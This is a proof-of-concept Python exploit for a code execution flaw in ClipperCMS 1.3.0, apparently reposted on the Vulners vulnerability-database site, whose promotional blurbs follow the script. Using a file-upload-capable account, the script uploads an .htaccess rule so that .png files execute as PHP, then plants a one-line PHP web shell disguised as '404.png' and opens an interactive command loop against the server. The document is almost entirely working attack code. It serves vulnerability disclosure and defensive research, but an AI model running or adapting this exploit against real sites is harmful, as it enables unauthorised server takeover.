#!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH [email protected]
import sys
import re
import requests # requires requests lib
if len(sys.argv) != 4:
exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"
def login(requestSession, url, username, password):
postData = {"ajax": "1", "username": username, "password": password}
return requestSession.post(url, data = postData, headers = {"referer": url})
def getFullPath(requestSession, url):
request = requestSession.get(url, headers = {"referer": url})
if "You don't have enough privileges" in request.text:
return "cant upload"
fullPath = re.search("var current_path = '(.*)';", request.text)
return fullPath.group(1)
def upload(requestSession, url, fileName, fileContent, postData):
filesData = {"userfile[0]": (fileName, fileContent)}
return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url})
def workingShell(url, fullPath):
return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/")
def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text)
command = raw_input("$ ")
requestSession = requests.session()
loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
exit("ERROR: Incorrect username or password")
else:
print("successful: login as " + username)
fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
exit("ERROR: user does not have required privileges")
else:
print("successful: user is allowed to use file manager. Full path: " + fullPath)
uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
exit("ERROR: could not upload .htaccess file")
else:
print("successful: .htaccess upload")
uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
exit("ERROR: could not upload shell")
else:
print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>")
if workingShell(url + "404.png?x=", fullPath):
print("successful: shell seems to be working")
else:
exit("ERROR: shell does not seem to be working correctly")
runShell(url + "404.png?x=")
#Blog Reference:
#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.htmlData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation